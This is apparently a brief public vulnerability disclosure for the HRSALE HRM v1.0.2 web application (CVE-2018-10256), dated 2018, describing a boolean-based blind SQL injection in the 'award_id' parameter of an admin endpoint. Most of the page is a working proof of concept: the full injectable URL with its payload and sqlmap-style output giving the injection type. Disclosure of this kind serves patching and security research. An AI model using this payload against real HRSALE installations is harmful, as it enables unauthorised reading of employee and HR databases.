HRSALE The Ultimate HRM v1.0.2 – ‘award_id’ SQL Injection

Authors:8bitsec               Risk:High 

CVE:CVE-2018-10256           0day:SQL Injection

0day -id:0DAY-17608           Date:2018-04-26

Product & Service Introduction

HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.

Description

SQL injection on [award_id] parameter.

POC

SQLi:
 
https://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS
 
Parameter: award_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS

Leave a Reply